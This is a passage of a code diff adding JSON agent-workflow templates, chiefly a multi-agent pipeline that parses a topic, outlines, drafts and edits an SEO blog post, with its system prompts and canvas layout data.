"dragging": false,
"height": 164,
"id": "Note:StrongKingsCamp",
"measured": {
"height": 164,
"width": 408
},
"position": {
"x": 446.54943226110845,
"y": 590.9443887062529
},
"resizing": false,
"selected": false,
"sourcePosition": "right",
"targetPosition": "left",
"type": "noteNode",
"width": 408
},
{
"data": {
"form": {
"text": "**Purpose**: \nThis agent reviews, polishes, and finalizes the blog post written by the BodyWriter_Agent. It ensures everything is clean, smooth, and SEO-compliant.\n\n**What it does**:\n- Improves grammar, sentence flow, and transitions \n- Makes sure the content reads naturally and professionally \n- Checks whether keywords are present and well integrated (but not overused) \n- Verifies that the structure follows the correct H1/H2/H3 format \n"
},
"label": "Note",
"name": "Editor Agent"
},
"dragHandle": ".note-drag-handle",
"dragging": false,
"height": 147,
"id": "Note:OpenOttersShow",
"measured": {
"height": 147,
"width": 357
},
"position": {
"x": 976.6858726228803,
"y": 422.7404806291804
},
"resizing": false,
"selected": false,
"sourcePosition": "right",
"targetPosition": "left",
"type": "noteNode",
"width": 357
}
]
},
"history": [],
"messages": [],
"path": [],
"retrieval": []
},
"avatar": "data:image/jpeg;base64,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"
}
agent/templates/image_lingo.json (new file, 263 lines)
File diff suppressed because one or more lines are too long

agent/templates/market_generate_seo_blog.json (new file, 915 lines)
@@ -0,0 +1,915 @@
{
"id": 12,
"title": "Generate SEO Blog",
"description": "This workflow automatically generates a complete SEO-optimized blog article based on a simple user input. You don’t need any writing experience. Just provide a topic or short request — the system will handle the rest.",
"canvas_type": "Marketing",
"dsl": {
"components": {
"Agent:BetterSitesSend": {
"downstream": [
"Agent:EagerNailsRemain"
],
"obj": {
"component_name": "Agent",
"params": {
"delay_after_error": 1,
"description": "",
"exception_comment": "",
"exception_default_value": "",
"exception_goto": [],
"exception_method": null,
"frequencyPenaltyEnabled": false,
"frequency_penalty": 0.3,
"llm_id": "deepseek-chat@DeepSeek",
"maxTokensEnabled": false,
"max_retries": 3,
"max_rounds": 3,
"max_tokens": 4096,
"mcp": [],
"message_history_window_size": 12,
"outputs": {
"content": {
"type": "string",
"value": ""
}
},
"parameter": "Balance",
"presencePenaltyEnabled": false,
"presence_penalty": 0.2,
"prompts": [
{
"content": "The parse and keyword agent output is {Agent:ClearRabbitsScream@content}",
"role": "user"
}
],
"sys_prompt": "# Role\n\nYou are the **Outline_Agent**, responsible for generating a clear and SEO-optimized blog outline based on the user's parsed writing intent and keyword strategy.\n\n# Tool Access:\n\n- You have access to a search tool called `Tavily Search`.\n\n- If you are unsure how to structure a section, you may call this tool to search for related blog outlines or content from Google.\n\n- Do not overuse it. Your job is to extract **structure**, not to write paragraphs.\n\n\n# Goals\n\n1. Create a well-structured outline with appropriate H2 and H3 headings.\n\n2. Ensure logical flow from introduction to conclusion.\n\n3. Assign 1\u20132 suggested long-tail keywords to each major section for SEO alignment.\n\n4. Make the structure suitable for downstream paragraph writing.\n\n\n\n\n#Note\n\n- Use concise, scannable section titles.\n\n- Do not write full paragraphs.\n\n- Prioritize clarity, logical progression, and SEO alignment.\n\n\n\n- If the blog type is \u201cTutorial\u201d or \u201cHow-to\u201d, include step-based sections.\n\n\n# Input\n\nYou will receive:\n\n- Writing Type (e.g., Tutorial, Informative Guide)\n\n- Target Audience\n\n- User Intent Summary\n\n- 3\u20135 long-tail keywords\n\n\nUse this information to design a structure that both informs readers and maximizes search engine visibility.\n\n# Output Format\n\n```markdown\n\n## Blog Title (suggested)\n\n[Give a short, SEO-friendly title suggestion]\n\n## Outline\n\n### Introduction\n\n- Purpose of the article\n\n- Brief context\n\n- **Suggested keywords**: [keyword1, keyword2]\n\n### H2: [Section Title 1]\n\n- [Short description of what this section will cover]\n\n- **Suggested keywords**: [keyword1, keyword2]\n\n### H2: [Section Title 2]\n\n- [Short description of what this section will cover]\n\n- **Suggested keywords**: [keyword1, keyword2]\n\n### H2: [Section Title 3]\n\n- [Optional H3 Subsection Title A]\n\n - [Explanation of sub-point]\n\n- [Optional H3 Subsection Title B]\n\n - [Explanation of sub-point]\n\n- **Suggested keywords**: [keyword1]\n\n### Conclusion\n\n- Recap key takeaways\n\n- Optional CTA (Call to Action)\n\n- **Suggested keywords**: [keyword3]\n\n",
"temperature": 0.5,
"temperatureEnabled": true,
"tools": [
{
"component_name": "TavilySearch",
"name": "TavilySearch",
"params": {
"api_key": "",
"days": 7,
"exclude_domains": [],
"include_answer": false,
"include_domains": [],
"include_image_descriptions": false,
"include_images": false,
"include_raw_content": true,
"max_results": 5,
"outputs": {
"formalized_content": {
"type": "string",
"value": ""
},
"json": {
"type": "Array<Object>",
"value": []
}
},
"query": "sys.query",
"search_depth": "basic",
"topic": "general"
}
}
],
"topPEnabled": false,
"top_p": 0.85,
"user_prompt": "",
"visual_files_var": ""
}
},
"upstream": [
"Agent:ClearRabbitsScream"
]
},
"Agent:ClearRabbitsScream": {
"downstream": [
"Agent:BetterSitesSend"
],
"obj": {
"component_name": "Agent",
"params": {
"delay_after_error": 1,
"description": "",
"exception_comment": "",
"exception_default_value": "",
"exception_goto": [],
"exception_method": null,
"frequencyPenaltyEnabled": false,
"frequency_penalty": 0.5,
"llm_id": "deepseek-chat@DeepSeek",
"maxTokensEnabled": false,
"max_retries": 3,
"max_rounds": 1,
"max_tokens": 4096,
"mcp": [],
"message_history_window_size": 12,
"outputs": {
"content": {
"type": "string",
"value": ""
}
},
"parameter": "Precise",
"presencePenaltyEnabled": false,
"presence_penalty": 0.5,
"prompts": [
{
"content": "The user query is {sys.query}",
"role": "user"
}
],
"sys_prompt": "# Role\n\nYou are the **Parse_And_Keyword_Agent**, responsible for interpreting a user's blog writing request and generating a structured writing intent summary and keyword strategy for SEO-optimized content generation.\n\n# Goals\n\n1. Extract and infer the user's true writing intent, even if the input is informal or vague.\n\n2. Identify the writing type, target audience, and implied goal.\n\n3. Suggest 3\u20135 long-tail keywords based on the input and context.\n\n4. Output all data in a Markdown format for downstream agents.\n\n# Operating Guidelines\n\n\n- If the user's input lacks clarity, make reasonable and **conservative** assumptions based on SEO best practices.\n\n- Always choose one clear \"Writing Type\" from the list below.\n\n- Your job is not to write the blog \u2014 only to structure the brief.\n\n# Output Format\n\n```markdown\n## Writing Type\n\n[Choose one: Tutorial / Informative Guide / Marketing Content / Case Study / Opinion Piece / How-to / Comparison Article]\n\n## Target Audience\n\n[Try to be specific based on clues in the input: e.g., marketing managers, junior developers, SEO beginners]\n\n## User Intent Summary\n\n[A 1\u20132 sentence summary of what the user wants to achieve with the blog post]\n\n## Suggested Long-tail Keywords\n\n- keyword 1\n\n- keyword 2\n\n- keyword 3\n\n- keyword 4 (optional)\n\n- keyword 5 (optional)\n\n\n\n\n## Input Examples (and how to handle them)\n\nInput: \"I want to write about RAGFlow.\"\n\u2192 Output: Informative Guide, Audience: AI developers, Intent: explain what RAGFlow is and its use cases\n\nInput: \"Need a blog to promote our prompt design tool.\"\n\u2192 Output: Marketing Content, Audience: product managers or tool adopters, Intent: raise awareness and interest in the product\n\n\n\nInput: \"How to get more Google traffic using AI\"\n\u2192 Output: How-to, Audience: SEO marketers, Intent: guide readers on applying AI for SEO growth",
"temperature": 0.2,
"temperatureEnabled": true,
"tools": [],
"topPEnabled": false,
"top_p": 0.75,
"user_prompt": "",
"visual_files_var": ""
}
},
"upstream": [
"begin"
]
},
"Agent:EagerNailsRemain": {
"downstream": [
"Agent:LovelyHeadsOwn"
],
"obj": {
"component_name": "Agent",
"params": {
"delay_after_error": 1,
"description": "",
"exception_comment": "",
"exception_default_value": "",
"exception_goto": [],
"exception_method": null,
"frequencyPenaltyEnabled": false,
"frequency_penalty": 0.5,
"llm_id": "deepseek-chat@DeepSeek",
"maxTokensEnabled": false,
"max_retries": 3,
"max_rounds": 5,
"max_tokens": 4096,
"mcp": [],
"message_history_window_size": 12,
"outputs": {
"content": {
"type": "string",
"value": ""
}
},
"parameter": "Precise",
"presencePenaltyEnabled": false,
"presence_penalty": 0.5,
"prompts": [
{
"content": "The parse and keyword agent output is {Agent:ClearRabbitsScream@content}\n\n\n\nThe Ouline agent output is {Agent:BetterSitesSend@content}",
"role": "user"
}
],
"sys_prompt": "# Role\n\nYou are the **Body_Agent**, responsible for generating the full content of each section of an SEO-optimized blog based on the provided outline and keyword strategy.\n\n# Tool Access:\n\nYou can use the `Tavily Search` tool to retrieve relevant content, statistics, or examples to support each section you're writing.\n\nUse it **only** when the provided outline lacks enough information, or if the section requires factual grounding.\n\nAlways cite the original link or indicate source where possible.\n\n\n# Goals\n\n1. Write each section (based on H2/H3 structure) as a complete and natural blog paragraph.\n\n2. Integrate the suggested long-tail keywords naturally into each section.\n\n3. When appropriate, use the `Tavily Search` tool to enrich your writing with relevant facts, examples, or quotes.\n\n4. Ensure each section is clear, engaging, and informative, suitable for both human readers and search engines.\n\n\n# Style Guidelines\n\n- Write in a tone appropriate to the audience. Be explanatory, not promotional, unless it's a marketing blog.\n\n- Avoid generic filler content. Prioritize clarity, structure, and value.\n\n- Ensure SEO keywords are embedded seamlessly, not forcefully.\n\n\n\n- Maintain writing rhythm. Vary sentence lengths. Use transitions between ideas.\n\n\n# Input\n\n\nYou will receive:\n\n- Blog title\n\n- Structured outline (including section titles, keywords, and descriptions)\n\n- Target audience\n\n- Blog type and user intent\n\nYou must **follow the outline strictly**. Write content **section-by-section**, based on the structure.\n\n\n# Output Format\n\n```markdown\n\n## H2: [Section Title]\n\n[Your generated content for this section \u2014 500-600 words, using keywords naturally.]\n\n",
"temperature": 0.2,
"temperatureEnabled": true,
"tools": [
{
"component_name": "TavilySearch",
"name": "TavilySearch",
"params": {
"api_key": "",
"days": 7,
"exclude_domains": [],
"include_answer": false,
"include_domains": [],
"include_image_descriptions": false,
"include_images": false,
"include_raw_content": true,
"max_results": 5,
"outputs": {
"formalized_content": {
"type": "string",
"value": ""
},
"json": {
"type": "Array<Object>",
"value": []
}
},
"query": "sys.query",
"search_depth": "basic",
"topic": "general"
}
}
],
"topPEnabled": false,
"top_p": 0.75,
"user_prompt": "",
"visual_files_var": ""
}
},
"upstream": [
"Agent:BetterSitesSend"
]
},
"Agent:LovelyHeadsOwn": {
"downstream": [
"Message:LegalBeansBet"
],
"obj": {
"component_name": "Agent",
"params": {
"delay_after_error": 1,
"description": "",
"exception_comment": "",
"exception_default_value": "",
"exception_goto": [],
"exception_method": null,
"frequencyPenaltyEnabled": false,
"frequency_penalty": 0.5,
"llm_id": "deepseek-chat@DeepSeek",
"maxTokensEnabled": false,
"max_retries": 3,
"max_rounds": 5,
"max_tokens": 4096,
"mcp": [],
"message_history_window_size": 12,
"outputs": {
"content": {
"type": "string",
"value": ""
}
},
"parameter": "Precise",
"presencePenaltyEnabled": false,
"presence_penalty": 0.5,
"prompts": [
{
"content": "The parse and keyword agent output is {Agent:ClearRabbitsScream@content}\n\nThe Ouline agent output is {Agent:BetterSitesSend@content}\n\nThe Body agent output is {Agent:EagerNailsRemain@content}",
"role": "user"
}
],
"sys_prompt": "# Role\n\nYou are the **Editor_Agent**, responsible for finalizing the blog post for both human readability and SEO effectiveness.\n\n# Goals\n\n1. Polish the entire blog content for clarity, coherence, and style.\n\n2. Improve transitions between sections, ensure logical flow.\n\n3. Verify that keywords are used appropriately and effectively.\n\n4. Conduct a lightweight SEO audit \u2014 checking keyword density, structure (H1/H2/H3), and overall searchability.\n\n\n\n# Style Guidelines\n\n- Be precise. Avoid bloated or vague language.\n\n- Maintain an informative and engaging tone, suitable to the target audience.\n\n- Do not remove keywords unless absolutely necessary for clarity.\n\n- Ensure paragraph flow and section continuity.\n\n\n# Input\n\nYou will receive:\n\n- Full blog content, written section-by-section\n\n- Original outline with suggested keywords\n\n- Target audience and writing type\n\n# Output Format\n\n```markdown\n\n[The revised, fully polished blog post content goes here.]\n\n",
"temperature": 0.2,
"temperatureEnabled": true,
"tools": [],
"topPEnabled": false,
"top_p": 0.75,
"user_prompt": "",
"visual_files_var": ""
}
},
"upstream": [
"Agent:EagerNailsRemain"
]
},
"Message:LegalBeansBet": {
"downstream": [],
"obj": {
"component_name": "Message",
"params": {
"content": [
"{Agent:LovelyHeadsOwn@content}"
]
}
},
"upstream": [
"Agent:LovelyHeadsOwn"
]
},
"begin": {
"downstream": [
"Agent:ClearRabbitsScream"
],
"obj": {
"component_name": "Begin",
"params": {
"enablePrologue": true,
"inputs": {},
"mode": "conversational",
"prologue": "Hi! I'm your SEO blog assistant.\n\nTo get started, please tell me:\n1. What topic you want the blog to cover\n2. Who is the target audience\n3. What you hope to achieve with this blog (e.g., SEO traffic, teaching beginners, promoting a product)\n"
}
},
"upstream": []
}
},
"globals": {
"sys.conversation_turns": 0,
"sys.files": [],
"sys.query": "",
"sys.user_id": ""
},
"graph": {
"edges": [
{
"data": {
"isHovered": false
},
"id": "xy-edge__beginstart-Agent:ClearRabbitsScreamend",
"source": "begin",
"sourceHandle": "start",
"target": "Agent:ClearRabbitsScream",
"targetHandle": "end"
},
{
"data": {
"isHovered": false
},
"id": "xy-edge__Agent:ClearRabbitsScreamstart-Agent:BetterSitesSendend",
"source": "Agent:ClearRabbitsScream",
"sourceHandle": "start",
"target": "Agent:BetterSitesSend",
"targetHandle": "end"
},
{
"data": {
"isHovered": false
},
"id": "xy-edge__Agent:BetterSitesSendtool-Tool:SharpPensBurnend",
"source": "Agent:BetterSitesSend",
"sourceHandle": "tool",
"target": "Tool:SharpPensBurn",
"targetHandle": "end"
},
{
"data": {
"isHovered": false
},
"id": "xy-edge__Agent:BetterSitesSendstart-Agent:EagerNailsRemainend",
"source": "Agent:BetterSitesSend",
"sourceHandle": "start",
"target": "Agent:EagerNailsRemain",
"targetHandle": "end"
},
{
"id": "xy-edge__Agent:EagerNailsRemaintool-Tool:WickedDeerHealend",
"source": "Agent:EagerNailsRemain",
"sourceHandle": "tool",
"target": "Tool:WickedDeerHeal",
"targetHandle": "end"
},
{
"data": {
"isHovered": false
},
"id": "xy-edge__Agent:EagerNailsRemainstart-Agent:LovelyHeadsOwnend",
"source": "Agent:EagerNailsRemain",
"sourceHandle": "start",
"target": "Agent:LovelyHeadsOwn",
"targetHandle": "end"
},
{
"data": {
"isHovered": false
},
"id": "xy-edge__Agent:LovelyHeadsOwnstart-Message:LegalBeansBetend",
"source": "Agent:LovelyHeadsOwn",
"sourceHandle": "start",
"target": "Message:LegalBeansBet",
"targetHandle": "end"
}
],
"nodes": [
{
"data": {
"form": {
"enablePrologue": true,
"inputs": {},
"mode": "conversational",
"prologue": "Hi! I'm your SEO blog assistant.\n\nTo get started, please tell me:\n1. What topic you want the blog to cover\n2. Who is the target audience\n3. What you hope to achieve with this blog (e.g., SEO traffic, teaching beginners, promoting a product)\n"
},
"label": "Begin",
"name": "begin"
},
"id": "begin",
"measured": {
"height": 48,
"width": 200
},
"position": {
"x": 50,
"y": 200
},
"selected": false,
"sourcePosition": "left",
"targetPosition": "right",
"type": "beginNode"
},
{
"data": {
"form": {
"delay_after_error": 1,
"description": "",
"exception_comment": "",
"exception_default_value": "",
"exception_goto": [],
"exception_method": null,
"frequencyPenaltyEnabled": false,
"frequency_penalty": 0.5,
"llm_id": "deepseek-chat@DeepSeek",
"maxTokensEnabled": false,
"max_retries": 3,
"max_rounds": 1,
"max_tokens": 4096,
"mcp": [],
"message_history_window_size": 12,
"outputs": {
"content": {
"type": "string",
"value": ""
}
},
"parameter": "Precise",
"presencePenaltyEnabled": false,
"presence_penalty": 0.5,
"prompts": [
{
"content": "The user query is {sys.query}",
"role": "user"
}
],
"sys_prompt": "# Role\n\nYou are the **Parse_And_Keyword_Agent**, responsible for interpreting a user's blog writing request and generating a structured writing intent summary and keyword strategy for SEO-optimized content generation.\n\n# Goals\n\n1. Extract and infer the user's true writing intent, even if the input is informal or vague.\n\n2. Identify the writing type, target audience, and implied goal.\n\n3. Suggest 3\u20135 long-tail keywords based on the input and context.\n\n4. Output all data in a Markdown format for downstream agents.\n\n# Operating Guidelines\n\n\n- If the user's input lacks clarity, make reasonable and **conservative** assumptions based on SEO best practices.\n\n- Always choose one clear \"Writing Type\" from the list below.\n\n- Your job is not to write the blog \u2014 only to structure the brief.\n\n# Output Format\n\n```markdown\n## Writing Type\n\n[Choose one: Tutorial / Informative Guide / Marketing Content / Case Study / Opinion Piece / How-to / Comparison Article]\n\n## Target Audience\n\n[Try to be specific based on clues in the input: e.g., marketing managers, junior developers, SEO beginners]\n\n## User Intent Summary\n\n[A 1\u20132 sentence summary of what the user wants to achieve with the blog post]\n\n## Suggested Long-tail Keywords\n\n- keyword 1\n\n- keyword 2\n\n- keyword 3\n\n- keyword 4 (optional)\n\n- keyword 5 (optional)\n\n\n\n\n## Input Examples (and how to handle them)\n\nInput: \"I want to write about RAGFlow.\"\n\u2192 Output: Informative Guide, Audience: AI developers, Intent: explain what RAGFlow is and its use cases\n\nInput: \"Need a blog to promote our prompt design tool.\"\n\u2192 Output: Marketing Content, Audience: product managers or tool adopters, Intent: raise awareness and interest in the product\n\n\n\nInput: \"How to get more Google traffic using AI\"\n\u2192 Output: How-to, Audience: SEO marketers, Intent: guide readers on applying AI for SEO growth",
"temperature": 0.2,
"temperatureEnabled": true,
"tools": [],
"topPEnabled": false,
"top_p": 0.75,
"user_prompt": "",
"visual_files_var": ""
},
"label": "Agent",
"name": "Parse And Keyword Agent"
},
"dragging": false,
"id": "Agent:ClearRabbitsScream",
"measured": {
"height": 84,
"width": 200
},
"position": {
"x": 344.7766966202233,
"y": 234.82202253184496
},
"selected": false,
"sourcePosition": "right",
"targetPosition": "left",
"type": "agentNode"
},
{
"data": {
"form": {
"delay_after_error": 1,
"description": "",
"exception_comment": "",
"exception_default_value": "",
"exception_goto": [],
"exception_method": null,
"frequencyPenaltyEnabled": false,
"frequency_penalty": 0.3,
"llm_id": "deepseek-chat@DeepSeek",
"maxTokensEnabled": false,
"max_retries": 3,
"max_rounds": 3,
"max_tokens": 4096,
"mcp": [],
"message_history_window_size": 12,
"outputs": {
"content": {
"type": "string",
"value": ""
}
},
"parameter": "Balance",
"presencePenaltyEnabled": false,
"presence_penalty": 0.2,
"prompts": [
{
"content": "The parse and keyword agent output is {Agent:ClearRabbitsScream@content}",
"role": "user"
}
],
"sys_prompt": "# Role\n\nYou are the **Outline_Agent**, responsible for generating a clear and SEO-optimized blog outline based on the user's parsed writing intent and keyword strategy.\n\n# Tool Access:\n\n- You have access to a search tool called `Tavily Search`.\n\n- If you are unsure how to structure a section, you may call this tool to search for related blog outlines or content from Google.\n\n- Do not overuse it. Your job is to extract **structure**, not to write paragraphs.\n\n\n# Goals\n\n1. Create a well-structured outline with appropriate H2 and H3 headings.\n\n2. Ensure logical flow from introduction to conclusion.\n\n3. Assign 1\u20132 suggested long-tail keywords to each major section for SEO alignment.\n\n4. Make the structure suitable for downstream paragraph writing.\n\n\n\n\n#Note\n\n- Use concise, scannable section titles.\n\n- Do not write full paragraphs.\n\n- Prioritize clarity, logical progression, and SEO alignment.\n\n\n\n- If the blog type is \u201cTutorial\u201d or \u201cHow-to\u201d, include step-based sections.\n\n\n# Input\n\nYou will receive:\n\n- Writing Type (e.g., Tutorial, Informative Guide)\n\n- Target Audience\n\n- User Intent Summary\n\n- 3\u20135 long-tail keywords\n\n\nUse this information to design a structure that both informs readers and maximizes search engine visibility.\n\n# Output Format\n\n```markdown\n\n## Blog Title (suggested)\n\n[Give a short, SEO-friendly title suggestion]\n\n## Outline\n\n### Introduction\n\n- Purpose of the article\n\n- Brief context\n\n- **Suggested keywords**: [keyword1, keyword2]\n\n### H2: [Section Title 1]\n\n- [Short description of what this section will cover]\n\n- **Suggested keywords**: [keyword1, keyword2]\n\n### H2: [Section Title 2]\n\n- [Short description of what this section will cover]\n\n- **Suggested keywords**: [keyword1, keyword2]\n\n### H2: [Section Title 3]\n\n- [Optional H3 Subsection Title A]\n\n - [Explanation of sub-point]\n\n- [Optional H3 Subsection Title B]\n\n - [Explanation of sub-point]\n\n- **Suggested keywords**: [keyword1]\n\n### Conclusion\n\n- Recap key takeaways\n\n- Optional CTA (Call to Action)\n\n- **Suggested keywords**: [keyword3]\n\n",
"temperature": 0.5,
"temperatureEnabled": true,
"tools": [
{
"component_name": "TavilySearch",
"name": "TavilySearch",
"params": {
"api_key": "",
"days": 7,
"exclude_domains": [],
"include_answer": false,
"include_domains": [],
"include_image_descriptions": false,
"include_images": false,
"include_raw_content": true,
"max_results": 5,
"outputs": {
"formalized_content": {
"type": "string",
"value": ""
},
"json": {
"type": "Array<Object>",
"value": []
}
},
"query": "sys.query",
"search_depth": "basic",
"topic": "general"
}
}
],
"topPEnabled": false,
"top_p": 0.85,
"user_prompt": "",
"visual_files_var": ""
},
"label": "Agent",
"name": "Outline Agent"
},
"dragging": false,
"id": "Agent:BetterSitesSend",
"measured": {
"height": 84,
"width": 200
},
"position": {
"x": 613.4368763415628,
"y": 164.3074269048589
},
"selected": false,
"sourcePosition": "right",
"targetPosition": "left",
"type": "agentNode"
},
{
"data": {
"form": {
"description": "This is an agent for a specific task.",
"user_prompt": "This is the order you need to send to the agent."
},
"label": "Tool",
"name": "flow.tool_0"
},
"dragging": false,
"id": "Tool:SharpPensBurn",
"measured": {
"height": 44,
"width": 200
},
"position": {
"x": 580.1877078861457,
"y": 287.7669662022325
},
"selected": false,
"sourcePosition": "right",
"targetPosition": "left",
"type": "toolNode"
},
{
"data": {
"form": {
"delay_after_error": 1,
"description": "",
"exception_comment": "",
"exception_default_value": "",
"exception_goto": [],
"exception_method": null,
"frequencyPenaltyEnabled": false,
"frequency_penalty": 0.5,
"llm_id": "deepseek-chat@DeepSeek",
"maxTokensEnabled": false,
"max_retries": 3,
"max_rounds": 5,
"max_tokens": 4096,
"mcp": [],
"message_history_window_size": 12,
"outputs": {
"content": {
"type": "string",
"value": ""
}
},
"parameter": "Precise",
"presencePenaltyEnabled": false,
"presence_penalty": 0.5,
"prompts": [
{
"content": "The parse and keyword agent output is {Agent:ClearRabbitsScream@content}\n\n\n\nThe Ouline agent output is {Agent:BetterSitesSend@content}",
"role": "user"
}
],
"sys_prompt": "# Role\n\nYou are the **Body_Agent**, responsible for generating the full content of each section of an SEO-optimized blog based on the provided outline and keyword strategy.\n\n# Tool Access:\n\nYou can use the `Tavily Search` tool to retrieve relevant content, statistics, or examples to support each section you're writing.\n\nUse it **only** when the provided outline lacks enough information, or if the section requires factual grounding.\n\nAlways cite the original link or indicate source where possible.\n\n\n# Goals\n\n1. Write each section (based on H2/H3 structure) as a complete and natural blog paragraph.\n\n2. Integrate the suggested long-tail keywords naturally into each section.\n\n3. When appropriate, use the `Tavily Search` tool to enrich your writing with relevant facts, examples, or quotes.\n\n4. Ensure each section is clear, engaging, and informative, suitable for both human readers and search engines.\n\n\n# Style Guidelines\n\n- 